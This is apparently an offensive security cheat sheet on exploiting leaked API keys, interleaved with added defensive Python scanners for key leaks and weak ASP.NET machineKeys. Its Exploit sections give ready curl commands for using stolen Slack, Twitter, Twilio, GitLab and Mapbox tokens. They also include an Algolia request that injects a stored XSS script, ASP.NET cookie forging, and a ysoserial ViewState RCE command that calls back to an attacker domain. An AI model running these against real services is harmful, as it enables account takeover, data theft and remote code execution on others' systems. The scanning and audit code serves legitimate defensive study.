API Key Leaks
An API key is a unique identifier used to authenticate requests associated with your project. Some developers hardcode them in source or leave them on public shares.
Summary
Tools
- KeyFinder - a tool that lets you find keys while surfing the web!
- Keyhacks - a repository showing quick ways to check whether API keys leaked by a bug bounty program are still valid.
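As an added defensive example that is not part of the original page: a small scanner for the token families listed on this page, run over constructed sample source lines. The Google Maps "AIza" and Twilio "AC"+32-hex formats are public key formats; the other patterns follow the prefixes, headers and query parameters shown in the commands below.

```python
import re

# Token families from this page, plus two well-known public key formats (Google Maps keys
# start with "AIza" and are 39 characters; Twilio Account SIDs are "AC" plus 32 hex chars).
# Patterns with a capture group pull the secret out of a header or query parameter.
PATTERNS = {
    "google_maps_key": re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"),
    "slack_token": re.compile(r"\bxox[pb]-[0-9A-Za-z-]{10,}"),
    "twilio_account_sid": re.compile(r"\bAC[0-9a-fA-F]{32}\b"),
    "mapbox_token": re.compile(r"\b(?:sk|pk|tk)\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
    "gitlab_private_token": re.compile(r"private_token=([A-Za-z0-9_-]{20,})"),
    "hockeyapp_token": re.compile(r"X-HockeyAppToken:\s*([0-9a-f]{32})", re.IGNORECASE),
    "algolia_api_key": re.compile(r"x-algolia-api-key:\s*([0-9a-f]{32})", re.IGNORECASE),
}

def redact(secret):
    """Keep only a short prefix and suffix so the report never re-leaks the full value."""
    if len(secret) <= 8:
        return "*" * len(secret)
    return secret[:4] + "..." + secret[-2:]

def find_leaked_keys(text):
    """Return (line_number, family, redacted_value) for every match in the given text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for family, rx in PATTERNS.items():
            for m in rx.finditer(line):
                secret = m.group(1) if m.groups() else m.group(0)
                findings.append((lineno, family, redact(secret)))
    return findings

# Constructed sample source lines; none of these values is a real credential.
SAMPLE_TEXT = "\n".join([
    'const mapsKey = "AIzaSyA' + "0" * 32 + '";',
    'SLACK_TOKEN = "xoxp-000000000000-000000000000-000000000000-0000000000000000"',
    'TWILIO_SID = "AC' + "0" * 32 + '"',
    'MAPBOX = "sk.eyJ1IjoiZGVtbyJ9.constructed-signature"',
    'url = "https://gitlab.example.com/api/v4/projects?private_token=glpat-' + "0" * 21 + '"',
    'curl -H "X-HockeyAppToken: ' + "ad13" * 8 + '" https://rink.hockeyapp.net/api/2/apps',
    'print("no secrets on this line")',
])

if __name__ == "__main__":
    for lineno, family, value in find_leaked_keys(SAMPLE_TEXT):
        print(f"line {lineno}: {family} -> {value}")
```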
Exploit
The following commands can be used to take over accounts or extract personal information from the API using the leaked token.
Google Maps
Use: https://github.com/ozguralp/gmapsapiscanner/
Impact:
- Consuming the company's monthly quota or over-billing through unauthorized use of the service, causing financial damage to the company
- Conducting a denial of service against the service if a maximum-bill limit is configured in the Google account
Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
Slack API Token
curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
Facebook Access Token
curl "https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2"
GitHub client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
Twilio Account_sid and Auth token
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
Twitter Bearer Token
curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
GitLab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
IIS Machine Keys
The machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Requirements
- machineKey validationKey and decryptionKey
- __VIEWSTATEGENERATOR cookies
- __VIEWSTATE cookies
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Common locations of web.config / machine.config
- 32-bit
  - C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
- 64-bit
  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
  - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
- in the registry when AutoGenerate is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
  - HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
  - HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
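As an added defensive example (not part of the original page or of Blacklist3r): an audit that parses the machineKey element of a web.config / machine.config and flags the conditions a known-key attack relies on, a published or default key and a weak validation algorithm. The known-key set is a constructed stand-in for a MachineKeys.txt-style list and contains the page's example key from the Microsoft docs.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for a Blacklist3r-style known-key list. The page's example key from
# the Microsoft docs belongs in it: a key that has been published anywhere is as good as none.
PAGE_EXAMPLE_KEY = ("87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A1"
                    "07187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC")
KNOWN_KEYS = {PAGE_EXAMPLE_KEY}
WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}

def audit_machine_key(config_xml, known_keys=KNOWN_KEYS):
    """Return (code, detail) findings for the <machineKey> element of a web.config."""
    mk = ET.fromstring(config_xml).find(".//machineKey")
    if mk is None:
        return [("NO_MACHINEKEY", "no explicit key; ASP.NET auto-generates one per server "
                                  "(AutoGenKey in the registry)")]
    findings = []
    vkey = mk.get("validationKey", "AutoGenerate,IsolateApps")
    dkey = mk.get("decryptionKey", "AutoGenerate,IsolateApps")
    if vkey.upper() in known_keys or dkey.upper() in known_keys:
        findings.append(("KNOWN_KEY", "key appears in a published key list; ViewState and "
                                      "forms-auth cookies can be forged"))
    valg = mk.get("validation")
    if valg is None:
        findings.append(("VALIDATION_UNSET", "default is SHA1 before .NET 4.5 and HMACSHA256 "
                                             "from 4.5; set it explicitly"))
    elif valg.upper() in WEAK_VALIDATION:
        findings.append(("WEAK_VALIDATION", f"validation={valg}; use HMACSHA256 or stronger"))
    dalg = mk.get("decryption", "Auto")
    if dalg.upper() in WEAK_DECRYPTION:
        findings.append(("WEAK_DECRYPTION", f"decryption={dalg}; use AES"))
    if not vkey.startswith("AutoGenerate") and len(vkey) < 128:
        findings.append(("SHORT_VALIDATION_KEY", f"{len(vkey)} hex chars; use the full 128"))
    return findings or [("OK", "no issues found")]

# The page's example <machineKey> inside a minimal, constructed web.config wrapper.
SAMPLE_WEB_CONFIG = f"""<configuration><system.web>
<machineKey validationKey="{PAGE_EXAMPLE_KEY}"
            decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
</system.web></configuration>"""

if __name__ == "__main__":
    for code, detail in audit_machine_key(SAMPLE_WEB_CONFIG):
        print(f"{code}: {detail}")
```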
Exploit with Blacklist3r
Identify known machine key
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> --macdecode
Generate ViewState for RCE
NOTE: In Burp you should URL Encode Key Characters for your payload.
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB --decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>"
Edit cookies with the machine key
Use this when you have the machineKey but ViewState is disabled.
ASP.NET Forms Authentication cookies: https://github.com/liquidsec/aspnetCryptTools
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
Mapbox API Token
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is sk, jackpot. If it's pk or tk, it's not worth your time.
# Check token validity
curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
# Get the list of all tokens associated with an account (only works if the token is a Secret Token (sk) and has the appropriate scope)
curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
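As an added example that is not part of the original page: an offline triage of a Mapbox-style token that classifies it by its sk/pk/tk prefix and decodes the JWT payload, with no API call. The sample token is constructed with a dummy signature; the "u" claim is assumed here to be the account username that Mapbox tokens carry.

```python
import base64
import json

# Verdicts in the page's terms: only an sk. token is a secret; pk. is meant for client-side
# code and tk. is a short-lived temporary token.
VERDICTS = {
    "sk": "secret token: rotate it and review any tokens it could have listed or created",
    "pk": "public token: expected in client-side code; check its scopes and URL restrictions",
    "tk": "temporary token: short-lived, low value",
}

def _b64url_decode(segment):
    """JWT segments are base64url without padding; restore the padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def triage_mapbox_token(token):
    """Classify a Mapbox-style token offline and decode its JWT payload.

    Raises ValueError for anything that is not <sk|pk|tk>.<payload>.<signature>."""
    parts = token.strip().split(".")
    if len(parts) != 3 or parts[0] not in VERDICTS:
        raise ValueError("expected an sk./pk./tk. prefix followed by payload and signature")
    try:
        claims = json.loads(_b64url_decode(parts[1]))
    except ValueError as exc:  # binascii.Error, JSONDecodeError and UnicodeDecodeError
        raise ValueError(f"payload is not base64url-encoded JSON: {exc}") from exc
    if not isinstance(claims, dict):
        raise ValueError("payload JSON is not an object")
    return {
        "type": parts[0],
        "secret": parts[0] == "sk",
        "username": claims.get("u"),  # assumed: "u" is the account username claim
        "claims": claims,
        "verdict": VERDICTS[parts[0]],
    }

def is_mapbox_token(token):
    """True when the token has the Mapbox shape and a decodable payload."""
    try:
        triage_mapbox_token(token)
        return True
    except ValueError:
        return False

def make_sample_token(kind, claims):
    """Build a constructed token with a dummy signature for offline tests; not a real credential."""
    payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).rstrip(b"=").decode()
    return f"{kind}.{payload}.constructed-signature"
```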
References
- Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019
- Private API key leakage due to lack of access control - yox - August 8, 2018
- Project Blacklist3r - @notsosecure - November 23, 2018
- Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020
- Mapbox API Token Documentation